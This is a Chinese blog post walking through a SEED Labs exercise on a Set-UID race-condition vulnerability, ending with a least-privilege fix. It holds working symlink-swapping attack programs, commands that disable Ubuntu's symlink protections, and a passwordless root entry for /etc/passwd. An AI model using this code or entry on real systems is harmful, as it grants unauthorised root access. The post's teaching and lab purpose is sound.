<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"sekla.cn","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"valine","storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="竞态条件漏洞​    竞态条件一般发生在多进程同时访问同一数据，如果一个特权程序有竞态条件漏洞，攻击者可以同时启动一个进程来与特权程序竞争，来有目的地改变程序行为。 Ubuntu有内置的静态漏洞攻击保护，这个系统来限制谁来创建符号链接，如果符号链接创建者和目录拥有者不匹配是无法创建的。所以要关闭这些系统： 123&#x2F;&#x2F; On Ubuntu 20.04, use the following:$ sud">
<meta property="og:type" content="article">
<meta property="og:title" content="Seed安全实验系列-(5)-竞态条件漏洞">
<meta property="og:url" content="http://sekla.cn/2021/12/09/ss-lab5-Race-Condition/index.html">
<meta property="og:site_name" content="Sekla&#39;s Blog">
<meta property="og:description" content="竞态条件漏洞​    竞态条件一般发生在多进程同时访问同一数据，如果一个特权程序有竞态条件漏洞，攻击者可以同时启动一个进程来与特权程序竞争，来有目的地改变程序行为。 Ubuntu有内置的静态漏洞攻击保护，这个系统来限制谁来创建符号链接，如果符号链接创建者和目录拥有者不匹配是无法创建的。所以要关闭这些系统： 123&#x2F;&#x2F; On Ubuntu 20.04, use the following:$ sud">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/ePwCQNF3a4D21I5.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/npYeJ6NzrwxG93H.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/kzhdBPuYM5ZEoKg.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/5PHgoJdeZrY2vIS.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/efQ7VjxzCrUK5En.png">
<meta property="og:image" content="https://s2.loli.net/2021/12/09/87j9CSLtucgBhXV.png">
<meta property="article:published_time" content="2021-12-09T04:00:00.000Z">
<meta property="article:modified_time" content="2021-12-09T11:39:50.134Z">
<meta property="article:author" content="Sekla">
<meta property="article:tag" content="Linux">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://s2.loli.net/2021/12/09/ePwCQNF3a4D21I5.png">

<link rel="canonical" href="http://sekla.cn/2021/12/09/ss-lab5-Race-Condition/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Seed安全实验系列-(5)-竞态条件漏洞 | Sekla's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

  <script type="text/javascript" src="/js/my_js/clicklove.js"></script>
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Sekla's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">Keep Learning Keep Doing</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签<span class="badge">14</span></a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类<span class="badge">23</span></a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档<span class="badge">100</span></a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://sekla.cn/2021/12/09/ss-lab5-Race-Condition/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Sekla">
      <meta itemprop="description" content="Sekla">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Sekla's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Seed安全实验系列-(5)-竞态条件漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2021-12-09 12:00:00 / 修改时间：19:39:50" itemprop="dateCreated datePublished" datetime="2021-12-09T12:00:00+08:00">2021-12-09</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">软件安全</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E8%BD%AF%E4%BB%B6%E5%AE%89%E5%85%A8/Seed%E5%AE%89%E5%85%A8%E5%AE%9E%E9%AA%8C%E7%B3%BB%E5%88%97/" itemprop="url" rel="index"><span itemprop="name">Seed安全实验系列</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span><br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>4.2k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>4 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="竞态条件漏洞"><a href="#竞态条件漏洞" class="headerlink" title="竞态条件漏洞"></a>竞态条件漏洞</h2><p>​    竞态条件一般发生在多进程同时访问同一数据，如果一个特权程序有竞态条件漏洞，攻击者可以同时启动一个进程来与特权程序竞争，来有目的地改变程序行为。</p>
<p>Ubuntu有内置的静态漏洞攻击保护，这个系统来限制谁来创建符号链接，如果符号链接创建者和目录拥有者不匹配是无法创建的。所以要关闭这些系统：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// On Ubuntu 20.04, use the following:</span><br><span class="line"><span class="meta">$</span><span class="bash"> sudo sysctl -w fs.protected_symlinks=0</span></span><br><span class="line"><span class="meta">$</span><span class="bash"> sudo sysctl fs.protected_regular=0</span></span><br></pre></td></tr></table></figure>

<a id="more"></a>

<h3 id="漏洞程序"><a href="#漏洞程序" class="headerlink" title="漏洞程序"></a>漏洞程序</h3><p>实验提供的vulp.c程序：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> * fn = <span class="string">&quot;/tmp/XYZ&quot;</span>;</span><br><span class="line">	<span class="keyword">char</span> buffer[<span class="number">60</span>];</span><br><span class="line">	FILE *fp;</span><br><span class="line">	<span class="comment">/* get user input */</span></span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">&quot;%50s&quot;</span>, buffer );</span><br><span class="line">	<span class="keyword">if</span>(!access(fn, W_OK))&#123; </span><br><span class="line">		fp = fopen(fn, <span class="string">&quot;a+&quot;</span>); </span><br><span class="line">		fwrite(<span class="string">&quot;\n&quot;</span>, <span class="keyword">sizeof</span>(<span class="keyword">char</span>), <span class="number">1</span>, fp);</span><br><span class="line">		fwrite(buffer, <span class="keyword">sizeof</span>(<span class="keyword">char</span>), <span class="built_in">strlen</span>(buffer), fp);</span><br><span class="line">		fclose(fp);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span> <span class="built_in">printf</span>(<span class="string">&quot;No permission \n&quot;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>程序是set-uid程序，它将一个用户输入字符串追加到临时文件/tmp/XYZ的末尾。当代码运行在root下，euid=0，可以覆写任何文件，为了阻止它意外覆写其他人的文件，所以第10行if首先检查真实用户id是否有对文件/tmp/XYZ的权限，有则打开文件。</p>
<p>如果在同时即access和fopen操作之间，access()使用的文件可能与fopen()使用的文件不同，即使它们具有相同的文件名/tmp/XYZ。这就产生了竞态条件漏洞，如果攻击者能够创建XYZ文件的一个符号链接指向/etc/passwd，攻击者可以导致用户输入到/etc/passwd中，然后获得特权。</p>
<p>首先设置：</p>
<p><img src="https://s2.loli.net/2021/12/09/ePwCQNF3a4D21I5.png" alt="image-20211209140218599"></p>
<h2 id="TASK1-选择目标"><a href="#TASK1-选择目标" class="headerlink" title="TASK1 选择目标"></a>TASK1 选择目标</h2><p>我们想利用程序中的竞争条件漏洞。我们选择的目标是密码文件/etc/passwd，普通用户无法写入该文件。通过利用这个漏洞，我们想要向密码文件中添加一条记录，目标是创建一个具有根权限的新用户帐户。在密码文件中，每个用户都有一个条目，该条目由7个用冒号(:)分隔的字段组成。下面列出了根用户的条目。</p>
<p><code>root:x:0:0:root:/root:/bin/bash</code></p>
<p>对于root用户，第三个域即用户id域，是一个0值，也就是说，当根用户登录时，它的进程的用户ID被设置为零，从而赋予该进程根权限。也就是说root用户的权限不是因为账户名，而是用户id域，如果想创建一个root权限的账户，只需要把0写到这个域上。第二个域即密码域，指示密码存在/etc/shadow这个文件里。有一个更简单的解决方案。我们可以简单地将密码放在那里，而不是在密码文件中添加“x”，这样操作系统就不会从影子文件中寻找密码。</p>
<p>密码字段不保存实际的密码;它保存着密码的单向哈希值。</p>
<p>为了获得给定密码的这样一个值，我们可以使用adduser命令在我们自己的系统中添加一个新用户，然后从影子文件中获得我们的密码的单向哈希值。或者我们可以简单地从种子用户的条目中复制值，因为我们知道它的密码。</p>
<p>有趣的是，Ubuntu中有一个用于无密码帐户的魔法值，这个魔法值是U6aMy0wojraho(第6个字符是0，而不是字母O)。如果我们把这个值放在用户输入的密码字段中，我们只需要在提示输入密码时按下return键。</p>
<h3 id="Task"><a href="#Task" class="headerlink" title="Task"></a>Task</h3><p>看看magic password是否工作，我们人工的添加入口到/etc/passwd文件中，看看能不能登录到test账户中。</p>
<p><code>test:U6aMy0wojraho:0:0:test:/root:/bin/bash</code></p>
<p>由于实验可能导致/etc/passwd文件莫名被清空。首先备份/etc/passwd文件，云环境下直接存一个快照即可。</p>
<p>完成此任务后，请从密码文件中删除此条目。在下一个任务中，我们需要作为一个普通用户来实现这个目标。</p>
<h2 id="TASK2-启动竞态条件攻击"><a href="#TASK2-启动竞态条件攻击" class="headerlink" title="TASK2 启动竞态条件攻击"></a>TASK2 启动竞态条件攻击</h2><p>此任务的目标是利用前面列出的易受攻击的Set-UID程序中的竞争条件漏洞。最终的目标是获得root权限。最关键的一步就是攻击，制造/tmp/XYZ指向密码文件，必须在窗口期中出现检查和使用;即在易受攻击的程序中access和fopen调用之间。</p>
<h3 id="A-模拟慢机器"><a href="#A-模拟慢机器" class="headerlink" title="A.模拟慢机器"></a>A.模拟慢机器</h3><p>在access和fopen之间添加sleep调用，模拟慢机器，我们是不能定义/tmp/XYZ文件的，因为它是硬编码程序，所以来创建一个符号链接来改变名字的意义，例如，可以创建一个/tmp/XYZ符号链接到/dev/null文件，当写入XYZ时，实际内容是写入到/dev/null中。</p>
<p><img src="https://s2.loli.net/2021/12/09/npYeJ6NzrwxG93H.png" alt="image-20211209143811147"></p>
<p>unlink可以解除符号链接。</p>
<p><img src="https://s2.loli.net/2021/12/09/kzhdBPuYM5ZEoKg.png" alt="image-20211209162923049"></p>
<p>首先添加10秒睡眠。然后运行vulp，将要写入的行输入回车后，在睡眠期间在另外一个窗口输入</p>
<p><code>ln -sf /etc/passwd /tmp/XYZ</code></p>
<p><img src="https://s2.loli.net/2021/12/09/5PHgoJdeZrY2vIS.png" alt="image-20211209163649674"></p>
<h3 id="B-真实攻击"><a href="#B-真实攻击" class="headerlink" title="B.真实攻击"></a>B.真实攻击</h3><p>实际上攻击窗口期很短，所以需要一直实验。</p>
<h4 id="attack-program"><a href="#attack-program" class="headerlink" title="attack program"></a>attack program</h4><p>编写attack program来用程序快速创建符号链接和删除符号链接。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">while</span>(<span class="number">1</span>)&#123;</span><br><span class="line">        unlink(<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        symlink(<span class="string">&quot;/dev/null&quot;</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        usleep(<span class="number">1000</span>);</span><br><span class="line">        unlink(<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        symlink(<span class="string">&quot;/etc/passwd&quot;</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">        usleep(<span class="number">1000</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>以上为attack程序代码。不断改变符号链接来尝试攻击。</p>
<p><img src="https://s2.loli.net/2021/12/09/efQ7VjxzCrUK5En.png" alt="image-20211209164910551"></p>
<p>成功攻击。</p>
<h3 id="C-提升攻击手段"><a href="#C-提升攻击手段" class="headerlink" title="C.提升攻击手段"></a>C.提升攻击手段</h3><p>攻击的时候XYZ文件的拥有者可能变成root，这个时候就无法攻击了，所以之前的备份是有用的。我们需要root权限才能移除这个符号链接或者XYZ文件，这是因为竞态竞争的条件问题。但是在这之前，我们一直不知道到底是什么原因导致XYZ文件拥有者变成root，但是直到现在：</p>
<p>主要原因是attack程序在unlink操作之后恰好发生了上下文切换，在symlink操作之前。</p>
<p>因为这两个操作并非原子，涉及到两个单独的系统调用，所以上下文切换发生，目标set-uid程序获得运行fopen函数的机会，他就创建一个新文件并带有root拥有者。</p>
<p>所以要解决这个问题，只需要把unlink和symlink定义成原子操作即可。</p>
<p>可以用renameat2系统调用，这个系统调用操作是原子的。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">define</span> _GNU_SOURCE</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span>&#123; </span><br><span class="line">    <span class="keyword">unsigned</span> <span class="keyword">int</span> flags = RENAME_EXCHANGE;</span><br><span class="line">    unlink(<span class="string">&quot;/tmp/XYZ&quot;</span>);symlink(<span class="string">&quot;/dev/null&quot;</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>);</span><br><span class="line">    unlink(<span class="string">&quot;/tmp/ABC&quot;</span>);symlink(<span class="string">&quot;etc/passwd&quot;</span>,<span class="string">&quot;tmp/ABC&quot;</span>);</span><br><span class="line">    <span class="keyword">while</span>(<span class="number">1</span>)&#123;</span><br><span class="line">        renameat2(<span class="number">0</span>,<span class="string">&quot;/tmp/XYZ&quot;</span>,<span class="number">0</span>,<span class="string">&quot;/tmp/ABC&quot;</span>,flags);</span><br><span class="line">        usleep(<span class="number">1000</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>修改攻击文件如上。</p>
<p><img src="https://s2.loli.net/2021/12/09/87j9CSLtucgBhXV.png" alt="image-20211209192549630"></p>
<h2 id="TASK3"><a href="#TASK3" class="headerlink" title="TASK3"></a>TASK3</h2><h3 id="A-应用最小权限原则"><a href="#A-应用最小权限原则" class="headerlink" title="A.应用最小权限原则"></a>A.应用最小权限原则</h3><p>将源文件添加setuid语句，以此来取消root权限，如果需要的话后面再开启。 </p>
<p>之前的攻击仍然有效，但由于我们将有效用户id设置为真实用户id，所以不能使用a+模式打开  /etc/passwd被/tmp/XYZ链接，因为我们实际上没有权利修改/etc/passwd. </p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">uid_t</span> uid = getuid();</span><br><span class="line">    <span class="keyword">uid_t</span> euid = geteuid();</span><br><span class="line">    <span class="keyword">char</span>* fn = <span class="string">&quot;/tmp/XYZ&quot;</span>;</span><br><span class="line">    <span class="keyword">char</span> buffer[<span class="number">60</span>];</span><br><span class="line">    FILE* fp;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/* get user input */</span></span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%50s&quot;</span>, buffer);</span><br><span class="line">    seteuid(uid);</span><br><span class="line">    <span class="keyword">if</span> (!access(fn, W_OK)) &#123;</span><br><span class="line">        fp = fopen(fn, <span class="string">&quot;a+&quot;</span>);</span><br><span class="line">        <span class="keyword">if</span> (!fp) &#123;</span><br><span class="line">            perror(<span class="string">&quot;Open failed&quot;</span>);</span><br><span class="line">            <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        fwrite(<span class="string">&quot;\n&quot;</span>, <span class="keyword">sizeof</span>(<span class="keyword">char</span>), <span class="number">1</span>, fp);</span><br><span class="line">        fwrite(buffer, <span class="keyword">sizeof</span>(<span class="keyword">char</span>), <span class="built_in">strlen</span>(buffer), fp);</span><br><span class="line">        fclose(fp);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;No permission \n&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>




    </div>
    
    
    

      <footer class="post-footer">
          
          <div class="post-tags">
              <a href="/tags/Linux/" rel="tag"><i class="fa fa-tag"></i> Linux</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/12/04/cppadv-this/" rel="prev" title="探究C++语法细节 this和inline细节">
      <i class="fa fa-chevron-left"></i> 探究C++语法细节 this和inline细节
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/12/15/linux-memModel-memMap/" rel="next" title="Linux下地址映射机制">
      Linux下地址映射机制 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AB%9E%E6%80%81%E6%9D%A1%E4%BB%B6%E6%BC%8F%E6%B4%9E"><span class="nav-number">1.</span> <span class="nav-text">竞态条件漏洞</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E7%A8%8B%E5%BA%8F"><span class="nav-number">1.1.</span> <span class="nav-text">漏洞程序</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK1-%E9%80%89%E6%8B%A9%E7%9B%AE%E6%A0%87"><span class="nav-number">2.</span> <span class="nav-text">TASK1 选择目标</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#Task"><span class="nav-number">2.1.</span> <span class="nav-text">Task</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK2-%E5%90%AF%E5%8A%A8%E7%AB%9E%E6%80%81%E6%9D%A1%E4%BB%B6%E6%94%BB%E5%87%BB"><span class="nav-number">3.</span> <span class="nav-text">TASK2 启动竞态条件攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-%E6%A8%A1%E6%8B%9F%E6%85%A2%E6%9C%BA%E5%99%A8"><span class="nav-number">3.1.</span> <span class="nav-text">A.模拟慢机器</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#B-%E7%9C%9F%E5%AE%9E%E6%94%BB%E5%87%BB"><span class="nav-number">3.2.</span> <span class="nav-text">B.真实攻击</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#attack-program"><span class="nav-number">3.2.1.</span> <span class="nav-text">attack program</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#C-%E6%8F%90%E5%8D%87%E6%94%BB%E5%87%BB%E6%89%8B%E6%AE%B5"><span class="nav-number">3.3.</span> <span class="nav-text">C.提升攻击手段</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#TASK3"><span class="nav-number">4.</span> <span class="nav-text">TASK3</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#A-%E5%BA%94%E7%94%A8%E6%9C%80%E5%B0%8F%E6%9D%83%E9%99%90%E5%8E%9F%E5%88%99"><span class="nav-number">4.1.</span> <span class="nav-text">A.应用最小权限原则</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Sekla"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Sekla</p>
  <div class="site-description" itemprop="description">Sekla</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">100</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">23</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">14</span>
